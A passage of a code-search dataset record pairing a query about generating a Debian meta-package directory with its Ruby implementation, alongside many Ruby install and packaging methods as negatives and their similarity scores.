"def install\n safe_system \"pax --insecure -rz -f Payload.gz -s ',./bin,#{bin},' -s ',./man,#{man},' -s ',./lib,#{lib},' -s ',./license_gpl_pdftk,#{prefix}/LICENSE,' -s ',./,#{prefix}/README/,'\"\n end",
"def generate_pkg_deps\n shellout!(\"pkgdepend generate -md #{source_dir} #{pkg_manifest_file}.2 | pkgfmt > #{pkg_manifest_file}.3\")\n shellout!(\"pkgmogrify -DARCH=`uname -p` #{pkg_manifest_file}.3 #{transform_file} | pkgfmt > #{pkg_manifest_file}.4\")\n shellout!(\"pkgdepend resolve -m #{pkg_manifest_file}.4\")\n shellout!(\"pkgmogrify #{pkg_manifest_file}.4.res #{versionlock_file} > #{pkg_manifest_file}.5.res\")\n end",
"def install!\n src = package_source\n chk = package_checksum\n windows_package 'Chef Development Kit' do\n source src\n checksum chk\n end\n end",
"def install\n prefix.install Dir[\"*\"] \n end",
"def define\n fail \"Version required (or :noversion)\" if @version.nil?\n @version = nil if :noversion == @version\n\n desc \"Build all the packages\"\n task :package\n\n desc \"Force a rebuild of the package files\"\n task repackage: [:clobber_package, :package]\n\n desc \"Remove package products\"\n task :clobber_package do\n rm_r package_dir rescue nil\n end\n\n task clobber: [:clobber_package]\n\n [\n [need_tar, tgz_file, \"z\"],\n [need_tar_gz, tar_gz_file, \"z\"],\n [need_tar_bz2, tar_bz2_file, \"j\"],\n [need_tar_xz, tar_xz_file, \"J\"]\n ].each do |need, file, flag|\n if need\n task package: [\"#{package_dir}/#{file}\"]\n file \"#{package_dir}/#{file}\" =>\n [package_dir_path] + package_files do\n chdir(working_dir) { sh @tar_command, \"#{flag}cvf\", file, target_dir }\n mv \"#{package_dir_path}/#{target_dir}\", package_dir if without_parent_dir\n end\n end\n end\n\n if need_zip\n task package: [\"#{package_dir}/#{zip_file}\"]\n file \"#{package_dir}/#{zip_file}\" =>\n [package_dir_path] + package_files do\n chdir(working_dir) { sh @zip_command, \"-r\", zip_file, target_dir }\n mv \"#{package_dir_path}/#{zip_file}\", package_dir if without_parent_dir\n end\n end\n\n directory package_dir_path => @package_files do\n @package_files.each do |fn|\n f = File.join(package_dir_path, fn)\n fdir = File.dirname(f)\n mkdir_p(fdir) unless File.exist?(fdir)\n if File.directory?(fn)\n mkdir_p(f)\n else\n rm_f f\n safe_ln(fn, f)\n end\n end\n end\n self\n end",
"def make_install\n run_with_failure_handler(\"cd #{@extracted_path} ; sudo make install\", 'make install')\n end",
"def pkg_install\n return if @install.count == 0\n\n sysprint \"#{@name} install\"\n\n if @install[:bsys_install] != nil\n if @bsdstyle == true\n FileUtils::cd(@srcdir)\n else\n FileUtils::cd(@objdir)\n end\n\n unless sysexec(@install[:bsys_install])\n syserr \"Failed to install package\"\n raise\n end\n\n FileUtils::cd(BSYS_ROOTDIR)\n\n @install.delete(:bsys_install)\n end\n\n @install.each_pair do |src, dst|\n dst = File::join($project_rootdir, dst)\n if File::directory? src\n FileUtils::mkdir_p dst\n continue\n end\n\n # Create directory if it doesn't exists\n FileUtils::mkdir_p dst[0..-(File::basename(dst).length + 1)]\n\n if File::executable? src\n FileUtils::install(src, dst, :mode => 0755)\n else\n FileUtils::install(src, dst, :mode => 0644)\n end\n end\n end",
"def install\n system \"./configure\", \"--disable-debug\",\n \"--disable-dependency-tracking\",\n \"--disable-silent-rules\",\n \"--prefix=#{prefix}\"\n system \"make\", \"install\" \n end",
"def install\n\n system \"cmake\", \".\", *std_cmake_args\n system \"make\", \"install\"\n\n resource(\"flightgear-data\").stage { (prefix/\"fgfs.app\"/\"Contents\"/\"Resources\"/\"data\").install Dir[\"./*\"] }\n \n #if build.with? \"scenery\"\n # resource(\"scenery\").stage { (\n #end\n\n end",
"def install_jaunty_sources\n has_exec(\"apt-get update\", :action => :nothing)\n\n lines =<<-EOF\ndeb http://archive.ubuntu.com/ubuntu/ jaunty main restricted\ndeb http://archive.ubuntu.com/ubuntu/ jaunty universe\ndeb http://archive.ubuntu.com/ubuntu/ jaunty multiverse\ndeb-src http://archive.ubuntu.com/ubuntu/ jaunty main restricted\ndeb-src http://archive.ubuntu.com/ubuntu/ jaunty universe\ndeb-src http://archive.ubuntu.com/ubuntu/ jaunty multiverse\nEOF\n lines.each_line do |l|\n has_line_in_file do \n file \"/etc/apt/sources.list\"\n line l \n notifies get_exec(\"apt-get update\"), :run\n end\n end\n end",
"def install_custom!\n remote_file local_path do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n dpkg_package local_path\n end",
"def generate_all\n copy_template_dir('layouts', 'layouts')\n copy_template_dir('content/bootstrap', 'content/bootstrap')\n copy_template_dir('content/content', 'content/content')\n delete_target_file('lib/default.rb')\n copy_template_dir('lib', 'lib')\n delete_target_file('Rules')\n copy_template_file('Rules', 'Rules')\n copy_template_file('.gitignore', '.gitignore')\n copy_template_file('cg_config.rb', 'cg_config.rb')\n copy_template_file('cg_config.rb_sample', 'cg_config.rb_sample')\n delete_target_file('content/stylesheet.css')\n delete_target_file('content/index.html')\n delete_target_file('layouts/default.html')\n create_empty_dir('content/images')\n end",
"def after_release_email(tag, note, type, selector, options) \n command = \"origen web compile --remote --api\" \n Dir.chdir Origen.root do \n system command \n end \n end",
"def generate_post\n return if @spec.extensions.empty?\n @rpm_post = \"echo \\\"Building native extensions. This could take a while...\\\"\\n\"\n # initialize make command string\n build_cmd = StringIO.new\n # start building make command\n dest_path = File.join @os_install_dir, \"gems\", \"#{name}-#{version}\", @spec.require_paths.first\n ran_rake = false # only run rake once\n\n @spec.extensions.each do |extension|\n break if ran_rake\n\n builder = case extension\n when /extconf/ then\n RGem2Rpm::Ext::ExtConfBuilder\n when /configure/ then\n RGem2Rpm::Ext::ConfigureBuilder\n when /rakefile/i, /mkrf_conf/i then\n ran_rake = true\n RGem2Rpm::Ext::RakeBuilder\n else\n nil\n end\n # get build\n build_cmd << builder.build(extension, dest_path)\n end\n # set rpm no arch to false\n @rpm_no_arch = false\n # return set post install\n @rpm_post = \"#{@rpm_post}#{build_cmd.string}\"\n end",
"def install\n end",
"def build_package\n # Force timestamp to be initialized before anything else. This gives us a\n # stable timestamp for the process.\n timestamp\n # Prepare the work area: copy files from root_path to work_path based on\n # the resolved Manifest.txt.\n prepare_work_area\n # Anything that has been modified locally needs to be reset.\n restore_modified_files\n # Save both the final release metadata and the in-package release metadata.\n save_release_metadata\n # Vendor the dependencies for the package.\n vendor_dependencies\n # Request that supporting plug-ins build the package.\n request_build_package\n end",
"def build_local(pkg_name, debian_pkg_name, versioned_build_dir, deb_filename, options)\n options, unknown_options = Kernel.filter_options options,\n :distributions => nil,\n :parallel_build_level => nil\n filepath = build_dir\n # cd package_name\n # tar -xf package_name_0.0.debian.tar.gz\n # tar -xf package_name_0.0.orig.tar.gz\n # mv debian/ package_name_0.0/\n # cd package_name_0.0/\n # debuild -us -uc\n # #to install\n # cd ..\n # sudo dpkg -i package_name_0.0.deb\n Packager.info \"Building #{pkg_name} locally with arguments: pkg_name #{pkg_name},\" \\\n \" debian_pkg_name #{debian_pkg_name},\" \\\n \" versioned_build_dir #{versioned_build_dir}\" \\\n \" deb_filename #{deb_filename}\" \\\n \" options #{options}\"\n\n begin\n FileUtils.chdir File.join(build_dir, debian_pkg_name, target_platform.to_s.gsub(\"/\",\"-\")) do\n if File.exist? \"debian\"\n FileUtils.rm_rf \"debian\"\n end\n if File.exist? versioned_build_dir\n FileUtils.rm_rf versioned_build_dir\n end\n FileUtils.mkdir versioned_build_dir\n\n debian_tar_gz = Dir.glob(\"*.debian.tar.gz\")\n debian_tar_gz.concat Dir.glob(\"*.debian.tar.xz\")\n if debian_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.debian.tar.gz in #{Dir.pwd}\"\n else\n debian_tar_gz = debian_tar_gz.first\n cmd = [\"tar\", \"-xf\", debian_tar_gz]\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n orig_tar_gz = Dir.glob(\"*.orig.tar.gz\")\n if orig_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.orig.tar.gz in #{Dir.pwd}\"\n else\n orig_tar_gz = orig_tar_gz.first\n cmd = [\"tar\"]\n cmd << \"-x\" << \"--strip-components=1\" <<\n \"-C\" << versioned_build_dir <<\n \"-f\" << orig_tar_gz\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n FileUtils.mv 'debian', versioned_build_dir + '/'\n FileUtils.chdir versioned_build_dir do\n cmd = [\"debuild\", \"-us\", \"-uc\"]\n if options[:parallel_build_level]\n cmd << \"-j#{options[:parallel_build_level]}\"\n end\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd}' failed\"\n end\n end\n\n filepath = Dir.glob(\"*.deb\")\n if filepath.size < 1\n raise RuntimeError, \"No debian file generated in #{Dir.pwd}\"\n elsif filepath.size > 1\n raise RuntimeError, \"More than one debian file available in #{Dir.pwd}: #{filepath}\"\n else\n filepath = filepath.first\n end\n end\n rescue Exception => e\n msg = \"Package #{pkg_name} has not been packaged -- #{e}\"\n Packager.error msg\n raise RuntimeError, msg\n end\n filepath\n end",
"def prepare_installation\n InstallOptions.configs = true\n InstallOptions.batch_files = true\n\n ARGV.options do |opts|\n opts.banner = \"Usage: #{File.basename($PROGRAM_NAME)} [options]\"\n opts.separator ''\n opts.on('--[no-]configs', 'Prevents the installation of config files', 'Default off.') do |onconfigs|\n InstallOptions.configs = onconfigs\n end\n opts.on('--destdir[=OPTIONAL]',\n 'Installation prefix for all targets',\n 'Default essentially /') do |destdir|\n InstallOptions.destdir = destdir\n end\n # opts.on('--configdir[=OPTIONAL]', 'Installation directory for config files', 'Default /etc') do |configdir|\n # InstallOptions.configdir = configdir\n # end\n opts.on('--bindir[=OPTIONAL]',\n 'Installation directory for binaries',\n 'overrides RbConfig::CONFIG[\"bindir\"]') do |bindir|\n InstallOptions.bindir = bindir\n end\n opts.on('--ruby[=OPTIONAL]',\n 'Ruby interpreter to use with installation',\n 'overrides ruby used to call install.rb') do |ruby|\n InstallOptions.ruby = ruby\n end\n opts.on('--sitelibdir[=OPTIONAL]',\n 'Installation directory for libraries',\n 'overrides RbConfig::CONFIG[\"sitelibdir\"]') do |sitelibdir|\n InstallOptions.sitelibdir = sitelibdir\n end\n opts.on('--mandir[=OPTIONAL]',\n 'Installation directory for man pages',\n 'overrides RbConfig::CONFIG[\"mandir\"]') do |mandir|\n InstallOptions.mandir = mandir\n end\n opts.on('--full', 'Performs a full installation. All', 'optional installation steps are run.') do |_full|\n InstallOptions.configs = true\n end\n opts.on('--no-batch-files', 'Prevents installation of batch files for windows', 'Default off') do |_batch_files|\n InstallOptions.batch_files = false\n end\n opts.separator('')\n opts.on_tail('--help', 'Shows this help text.') do\n warn opts\n exit\n end\n\n opts.parse!\n end\n\n version = [RbConfig::CONFIG['MAJOR'], RbConfig::CONFIG['MINOR']].join('.')\n libdir = File.join(RbConfig::CONFIG['libdir'], 'ruby', version)\n\n # Mac OS X 10.5 and higher declare bindir\n # /System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/bin\n # which is not generally where people expect executables to be installed\n # These settings are appropriate defaults for all OS X versions.\n RbConfig::CONFIG['bindir'] = '/usr/bin' if RUBY_PLATFORM =~ /^universal-darwin[\\d\\.]+$/\n\n # if InstallOptions.configdir\n # configdir = InstallOptions.configdir\n # elsif windows?\n # path = File.join(File.dirname(__FILE__), \"lib\", \"custom_facts\", \"util\", \"config.rb\")\n # require_relative(path)\n\n # configdir = File.join(LegacyFacter::Util::Config.windows_data_dir, \"PuppetLabs\", \"facter\", \"etc\")\n # else\n # configdir = File.join('/', 'etc', 'puppetlabs', 'facter')\n # end\n\n bindir = InstallOptions.bindir || RbConfig::CONFIG['bindir']\n\n if InstallOptions.sitelibdir\n sitelibdir = InstallOptions.sitelibdir\n else\n sitelibdir = RbConfig::CONFIG['sitelibdir']\n if sitelibdir.nil?\n sitelibdir = $LOAD_PATH.find { |x| x =~ /site_ruby/ }\n if sitelibdir.nil?\n sitelibdir = File.join(libdir, 'site_ruby')\n elsif sitelibdir !~ Regexp.quote(version)\n sitelibdir = File.join(sitelibdir, version)\n end\n end\n end\n\n mandir = InstallOptions.mandir || RbConfig::CONFIG['mandir']\n\n # This is the new way forward\n destdir = InstallOptions.destdir || ''\n\n # configdir = join(destdir, configdir)\n bindir = join(destdir, bindir)\n mandir = join(destdir, mandir)\n sitelibdir = join(destdir, sitelibdir)\n\n # makedirs(configdir) if InstallOptions.configs\n makedirs(bindir)\n makedirs(mandir)\n makedirs(sitelibdir)\n\n 
InstallOptions.site_dir = sitelibdir\n # InstallOptions.config_dir = configdir\n InstallOptions.bin_dir = bindir\n InstallOptions.lib_dir = libdir\n InstallOptions.man_dir = mandir\n end",
"def install\n yaourt('--noconfirm', '-Sy', @resource[:name])\n end",
"def install\n bin.install \"jsonfilter.sh\" => \"jsonfilter\"\n bin.install \"jsontocsv.py\" => \"jsontocsv\"\n bin.install \"tomltojsonfilter.sh\" => \"tomltojsonfilter\"\n bin.install \"yamltojsonfilter.sh\" => \"yamltojsonfilter\"\n bin.install \"csvtojson.sh\" => \"csvtojson\"\n bin.install \"jsontotomlfilter.sh\" => \"jsontotomlfilter\"\n bin.install \"jsontoyamlfilter.sh\" => \"jsontoyamlfilter\"\n # virtualenv_install_with_resources :using => \"python@3.6\"\n end",
"def install\n # ENV.deparallelize # if your formula fails when building in parallel\n\n # Remove unrecognized options if warned by configure\n #system \"./configure\", \"--disable-debug\",\n #\"--disable-dependency-tracking\",\n #\"--disable-silent-rules\",\n #\"--prefix=#{prefix}\"\n # system \"cmake\", \".\", *std_cmake_args\n #system \"make\", \"install\" # if this fails, try separate make/make install steps\n bin.install \"c9ide\"\n end",
"def install\n cd \"src\" do\n system \"make\"\n bin.install \"mbsum\", \"bucky\"\n end\n pkgshare.install [\"data\", \"scripts\", \"doc\"]\n end",
"def install\n ENV[\"GOPATH\"] = buildpath\n ENV[\"PATH\"] = \"#{ENV[\"PATH\"]}:#{ENV[\"GOPATH\"]}/bin\"\n (buildpath/\"src/github.com/linkerd/namerctl\").install buildpath.children\n cd \"src/github.com/linkerd/namerctl\" do\n system \"go\", \"build\", \"-o\", bin/\"namerctl\"\n prefix.install_metafiles\n end\n end",
"def install\n system \"make\"\n bin.install \"hisat2\", Dir[\"hisat2-*\"]\n doc.install Dir[\"doc/*\"]\n end",
"def pack\n #Throw the postflight script into the Scripts directory\n safe_system(\"sudo #{INSTALL} -m 0755 postflight #{@working_tree['SCRIPT_D']}\")\n safe_system(\"sudo #{INSTALL} -m 0755 Welcome.txt #{@working_tree['RESOURCE_D']}\")\nend",
"def compile\n # setup configurations\n configurations\n\n # Download and untar apache2\n apache2 = download_untar @configuration[\"download_url\"]\n\n # download and untar zlib\n zlib = download_untar @configuration[\"zlib_download_url\"]\n\n @logger.debug\"ZlIB Dir Content: #{Dir[File.join(zlib,\"*\")]}\"\n # configure and compile zlib\n zlib_configure_file = File.join(zlib,\"configure\")\n zlib_install_dir = File.join(@application.cache_dir,\"zlib\")\n\n shell_script = File.join(@application.buildpack_dir,\"resources/shell/compile_zlib.sh\");\n fail \"Shell Script failed\" unless 0 == system(\"./#{shell_script}\")\n # @logger.debug(\"#{zlib_configure_file} --prefix=#{zlib_install_dir}\")\n # result = system(\"#{zlib_configure_file} --prefix=#{zlib_install_dir}\")\n #\n # puts result\n # @logger.debug(\"Configure ZLIB result: #{result[0..-100]}\")\n #\n # # Make zlib\n # @logger.debug(\"make -C #{zlib}\")\n # result = `make -C #{zlib}`\n # puts result\n # @logger.debug(\"Make ZLIB result: #{result[0..-100]}\")\n # @logger.debug(\"make install -C #{zlib}\")\n # result = `make install -C #{zlib}`\n # @logger.debug(\"Make Install Result: #{result[0..-100]}\")\n\n @logger.debug \"Zlib Install Location: #{Dir[File.join(zlib_install_dir,'*')]}\"\n\n end",
"def action_create\n\n install_prerequisites\n\n node.set['pedant'][new_resource.variant]['etc_dir'] = new_resource.config_dir\n\n directory new_resource.config_dir do\n owner new_resource.user\n group new_resource.group\n mode \"0755\"\n recursive true\n end\n\n source_dir = \"#{new_resource.checkout_dir}/#{new_resource.variant}\"\n\n git new_resource.variant do\n destination source_dir\n repository \"git@github.com:opscode/#{new_resource.variant}.git\"\n revision new_resource.revision\n user new_resource.git_user\n end\n\n node.set['pedant'][new_resource.variant]['dir'] = \"/srv/#{new_resource.variant}\"\n\n link node['pedant'][new_resource.variant]['dir'] do\n to source_dir\n end\n\n template \"#{new_resource.config_dir}/pedant_config.rb\" do\n source new_resource.config_template\n owner new_resource.user\n group new_resource.group\n mode \"0644\"\n variables(new_resource.variables)\n end\n\n execute \"bundle install\" do\n cwd node['pedant'][new_resource.variant]['dir']\n # user \"opscode\"\n end\n\nend",
"def install\n bin.install \"#{PACKAGE_NAME}\"\n end",
"def install\n ensure_development_dependency\n template('lib/versioned/version.rb.tt', \"lib/#{namespaced_path}/version.rb\")\n install_bundle\n template('CHANGELOG.md.tt', 'CHANGELOG.md')\n template('CONTRIBUTING.md.tt', 'CONTRIBUTING.md')\n template('RELEASING.md.tt', 'RELEASING.md')\n template('UPGRADING.md.tt', 'UPGRADING.md')\n setup_rspec\n end",
"def install\n system \"cd c; make build\"\n\n bin.install \"c/helloworld\" => \"helloworld-c\"\n end",
"def install!\n include_recipe 'zypper'\n super\n end",
"def build!\n create_output_directory\n spec.source_directories.each { |d| simple_compile_directory(d) }\n compile_files(spec.all_javascript_paths)\n compile_files(spec.all_stylesheet_paths)\n write_manifest\n end",
"def install\n prefix.install Dir[\"*\"]\n end",
"def install\n prefix.install Dir[\"*\"]\n end",
"def common_generator\n if name.to_s.downcase == 'install'\n cp_config\n cp_models\n cp_controllers\n else\n puts 'Try to use: rails g the_banners install'\n end\n end",
"def install(env); end",
"def compile_hiera_files(nodes, clean_export)\n update_compiled_ssh_configs # must come first\n sanity_check(nodes)\n manager.export_nodes(nodes)\n manager.export_secrets(clean_export)\n end",
"def install\n libexec.install \"phyutility.jar\"\n bin.write_jar_script libexec/\"phyutility.jar\", \"phyutility\"\n pkgshare.install \"examples\", \"manual.pdf\"\n end",
"def pre_build\n puts \"pre_build dir=#{`pwd`}\"\n rbvt = RUBY_V\n rbvm = RUBY_V[/^\\d+\\.\\d+/]\n # remove leftovers from previous rake.\n rm_rf \"#{TGT_DIR}/lib\"\n rm_rf \"#{TGT_DIR}/etc\"\n rm_rf \"#{TGT_DIR}/share\"\n rm_rf \"#{TGT_DIR}/conf.d\"\n mkdir_p \"#{TGT_DIR}/lib\"\n cp_r \"#{EXT_RUBY}/lib/ruby\", \"#{TGT_DIR}/lib\"\n # copy include files\n mkdir_p \"#{TGT_DIR}/lib/ruby/include/ruby-#{rbvt}\"\n cp_r \"#{EXT_RUBY}/include/ruby-#{rbvt}/\", \"#{TGT_DIR}/lib/ruby/include\"\n SOLOCS.each_value do |path|\n cp \"#{path}\", \"#{TGT_DIR}\"\n end\n # do some windows things\n mkdir_p \"#{TGT_DIR}/share/glib-2.0/schemas\"\n if APP['GTK'] == \"gtk+-2.0\" \n cp_r\"#{TGT_SYS_DIR}/share/glib-2.0/schemas/gschema.dtd\",\n \"#{TGT_DIR}/share/glib-2.0/schemas\"\n cp_r \"#{ShoesDeps}/share/fontconfig\", \"#{TGT_DIR}/share\"\n cp_r \"#{ShoesDeps}/share/themes\", \"#{TGT_DIR}/share\"\n cp_r \"#{ShoesDeps}/share/xml\", \"#{TGT_DIR}/share\"\n cp_r \"#{ShoesDeps}/share/icons\", \"#{TGT_DIR}/share\"\n elsif APP['GTK'] == \"gtk+-3.0\"\n cp \"#{TGT_SYS_DIR}share/glib-2.0/schemas/gschemas.compiled\" ,\n \"#{TGT_DIR}/share/glib-2.0/schemas\"\n cp_r \"#{ShoesDeps}/share/fontconfig\", \"#{TGT_DIR}/share\"\n cp_r \"#{ShoesDeps}/share/themes\", \"#{TGT_DIR}/share\"\n cp_r \"#{ShoesDeps}/share/xml\", \"#{TGT_DIR}/share\"\n cp_r \"#{ShoesDeps}/share/icons\", \"#{TGT_DIR}/share\"\n else\n cp \"#{TGT_SYS_DIR}share/glib-2.0/schemas/gschemas.compiled\" ,\n \"#{TGT_DIR}/share/glib-2.0/schemas\"\n end\n sh \"#{WINDRES} -I. shoes/appwin32.rc shoes/appwin32.o\"\n cp_r \"#{ShoesDeps}/etc\", TGT_DIR\n mkdir_p \"#{ShoesDeps}/lib\"\n if APP['GTK'] == \"gtk+-3.0\"\n cp_r \"#{ShoesDeps}/lib/gtk-3.0\", \"#{TGT_DIR}/lib\" # shoes, exerb, ruby here\n else\n cp_r \"#{ShoesDeps}/lib/gtk-2.0\", \"#{TGT_DIR}/lib\" # shoes, exerb, ruby here\n end\n bindir = \"#{ShoesDeps}/bin\"\n #cp_r \"#{bindir}/fc-cache.exe\", TGT_DIR\n cp_r \"#{bindir}/gtk-update-icon-cache.exe\", TGT_DIR\n # below for debugging purposes\n if ENV['GDB'] \n cp \"#{bindir}/fc-cat.exe\", TGT_DIR\n cp \"#{bindir}/fc-list.exe\", TGT_DIR\n cp \"#{bindir}/fc-match.exe\", TGT_DIR\n cp \"#{bindir}/fc-pattern.exe\", TGT_DIR\n cp \"#{bindir}/fc-query.exe\", TGT_DIR\n cp \"#{bindir}/fc-scan.exe\", TGT_DIR\n cp \"#{bindir}/fc-validate.exe\", TGT_DIR\n end\n # disable MS Theme\n if !ENABLE_MS_THEME \n Dir.chdir(\"#{TGT_DIR}/share/themes/MS-Windows/gtk-2.0/\") do\n mv 'gtkrc', 'disabled-gtkrc'\n end\n else\n # add our overrides to the MS-Windows theme\n cp \"platform/msw/gtkrc\", \"#{TGT_DIR}/etc/gtk-2.0/\"\n end\n end",
"def install!\n refresh_file_accessors\n prepare_pod_groups\n add_source_files_references\n add_frameworks_bundles\n add_vendored_libraries\n add_resources\n add_developer_files unless sandbox.development_pods.empty?\n link_headers\n end",
"def install\n bin.install \"bin/vh-config\"\n end",
"def install\n for t in CROSS_TARGETS\n mkdir \"#{t}\" do\n system \"../configure\",\n \"--srcdir=../\",\n \"--target=#{t}\",\n \"--prefix=#{prefix}\",\n \"--disable-nls\"\n system \"make\", \"all\", \"ERROR_ON_WARNING=no\"\n system \"make\", \"install\"\n end\n end\n end",
"def install\n\n # --- custom ---\n ENV.prepend_path \"PKG_CONFIG_PATH\", \"/usr/local/lib/pkgconfig/\"\n inreplace \"build/modules.conf.in\", /^codecs/, \"#codecs\"\n\n args = []\n if build.with?(\"freetype\")\n ENV.append_to_cflags \"-I#{Formula[\"freetype\"].opt_include}/freetype2/\"\n else\n args << \"--without-freetype\"\n end\n\n if build.with?(\"lua\")\n ENV.append_to_cflags \"-I#{Formula[\"lua\"].opt_include}/lua/\"\n else\n inreplace \"build/modules.conf.in\", \"languages/mod_lua\",\n \"#languages/mod_lua\"\n end\n\n if build.with?(\"amqp\")\n inreplace \"build/modules.conf.in\", \"#event_handlers/mod_amqp\",\n \"event_handlers/mod_amqp\"\n end\n\n if build.with?(\"shout\")\n inreplace \"build/modules.conf.in\", \"#formats/mod_shout\",\n \"formats/mod_shout\"\n end\n\n if build.with?(\"libyuv\")\n raise \"Building with libyuv is not supported yet\"\n else\n args << \"--disable-libyuv\"\n end\n\n if build.with?(\"libvpx\")\n raise \"Building with libvpx is not supported yet\"\n else\n args << \"--disable-libvpx\"\n end\n\n # --- end of custom ---\n\n ENV[\"ac_cv_lib_lzma_lzma_code\"] = \"no\" # prevent opportunistic linkage to xz\n\n # avoid a dependency on ldns to prevent OpenSSL version conflicts\n inreplace \"build/modules.conf.in\", \"applications/mod_enum\",\n \"#applications/mod_enum\"\n\n system \"./bootstrap.sh\", \"-j\"\n\n # tiff will fail to find OpenGL unless told not to use X\n inreplace \"libs/tiff-4.0.2/configure.gnu\", \"--with-pic\", \"--with-pic --without-x\"\n\n system \"./configure\", \"--disable-dependency-tracking\",\n \"--enable-shared\",\n \"--enable-static\",\n \"--prefix=#{prefix}\",\n \"--exec_prefix=#{prefix}\",\n *args,\n \"LIBS=#{ENV['LIBS']}\",\n \"CFLAGS=#{ENV['CFLAGS']}\",\n \"CXXFLAGS=#{ENV['CFLAGS']}\",\n \"LDFLAGS=#{ENV['LDFLAGS']}\"\n\n system \"make\"\n system \"make\", \"install\", \"all\"\n\n if build.with?(\"moh\")\n # Should be equivalent to: system \"make\", \"cd-moh-install\"\n mkdir_p share/\"freeswitch/sounds/music\"\n [8, 16, 32, 48].each do |n|\n resource(\"sounds-music-#{n}000\").stage do\n cp_r \".\", share/\"freeswitch/sounds/music\"\n end\n end\n end\n\n if build.with?(\"sounds-en\")\n # Should be equivalent to: system \"make\", \"cd-sounds-install\"\n mkdir_p share/\"freeswitch/sounds/en\"\n [8, 16, 32, 48].each do |n|\n resource(\"sounds-en-us-callie-#{n}000\").stage do\n cp_r \".\", share/\"freeswitch/sounds/en\"\n end\n end\n end\n\n if build.with?(\"sounds-fr\")\n # Should be equivalent to: system \"make\", \"cd-sounds-fr-install\"\n mkdir_p share/\"freeswitch/sounds/fr\"\n [8, 16, 32, 48].each do |n|\n resource(\"sounds-fr-ca-june-#{n}000\").stage do\n cp_r \".\", share/\"freeswitch/sounds/fr\"\n end\n end\n end\n\n if build.with?(\"sounds-ru\")\n # Should be equivalent to: system \"make\", \"cd-sounds-ru-install\"\n mkdir_p share/\"freeswitch/sounds/ru\"\n [8, 16, 32, 48].each do |n|\n resource(\"sounds-ru-RU-elena-#{n}000\").stage do\n cp_r \".\", share/\"freeswitch/sounds/ru\"\n end\n end\n end\n end",
"def install\n system \"make\"\n bin.install %w[Catrack DAM2fasta DB2fasta DB2quiva DBdust DBrm DBshow DBsplit DBstats fasta2DAM fasta2DB\n quiva2DB simulator]\n doc.install \"README\"\n end",
"def execute_installation\n #start logging\n set_log_file @options[:log]\n \n download_and_decompress(@options[:prefix], [REDIS_URL, SQLITE3_URL, NGINX_URL])\n \n install_redis if @options[:redis]\n install_sqlite\n configure_nginx @options\n\n install_all_gems\n install_rhoconnect\n \n #remove downloaded tarballs\n cleanup options[:prefix]\n end"
] | [
"0.63612086",
"0.62468463",
"0.62115836",
"0.619243",
"0.6188494",
"0.61588025",
"0.6139201",
"0.6111842",
"0.6008117",
"0.60080624",
"0.60006094",
"0.59659886",
"0.59646237",
"0.5957808",
"0.5957808",
"0.5948403",
"0.59406453",
"0.59402007",
"0.5930946",
"0.59274274",
"0.59237736",
"0.5923281",
"0.59090066",
"0.59039825",
"0.58892065",
"0.5857764",
"0.5837098",
"0.58263344",
"0.5825742",
"0.5803784",
"0.5794561",
"0.578937",
"0.5786718",
"0.57830876",
"0.57805914",
"0.5771427",
"0.5769558",
"0.57629925",
"0.5742863",
"0.5722196",
"0.57108814",
"0.57081497",
"0.5697921",
"0.56857914",
"0.56823605",
"0.5663371",
"0.56601894",
"0.565637",
"0.564519",
"0.5636383",
"0.5628623",
"0.5621094",
"0.56139755",
"0.5606855",
"0.55997515",
"0.55971307",
"0.5596555",
"0.55963874",
"0.5594069",
"0.55919695",
"0.5574937",
"0.55541396",
"0.55528915",
"0.55497926",
"0.55484134",
"0.55463976",
"0.5544823",
"0.5538559",
"0.5537169",
"0.5532093",
"0.55191565",
"0.5509273",
"0.5507101",
"0.5506925",
"0.5505829",
"0.55026656",
"0.5500419",
"0.5491723",
"0.5483195",
"0.54825294",
"0.5476574",
"0.5474395",
"0.54739034",
"0.5471342",
"0.5467108",
"0.54638267",
"0.5461605",
"0.54557246",
"0.54557246",
"0.54526716",
"0.54499674",
"0.54417497",
"0.5435776",
"0.543543",
"0.543504",
"0.5432445",
"0.54294294",
"0.5429143",
"0.5428361",
"0.5425377"
] | 0.62992585 | 1 |
Generate the debian_dir for a meta package, i.e. representing a package set or a full release. Return [String] the main packages directory | def generate_debian_dir_meta(name, depends, base_dir: Dir.pwd, version: "0.1", distribution: nil)
existing_debian_dir = File.join("#{name}-#{version}","debian-meta")
template_dir =
if File.directory?(existing_debian_dir)
existing_debian_dir
else
TEMPLATES_META
end
dir = File.join(base_dir, "debian")
FileUtils.mkdir_p dir
debian_name = debian_meta_name(name)
debian_version = "#{version}"
if distribution
debian_version += '~' + distribution
end
deps_rock_packages = depends
deps_osdeps_packages = []
deps_nonnative_packages = []
Packager.info "Required OS Deps: #{deps_osdeps_packages}"
Packager.info "Required Nonnative Deps: #{deps_nonnative_packages}"
Find.find(template_dir) do |path|
next if File.directory?(path)
template = ERB.new(File.read(path), nil, "%<>", path.gsub(/[^w]/, '_'))
begin
rendered = template.result(binding)
rescue
puts "Error in #{path}:"
raise
end
target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)
FileUtils.mkdir_p File.dirname(target_path)
File.open(target_path, "w") do |io|
io.write(rendered)
end
end
return dir
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
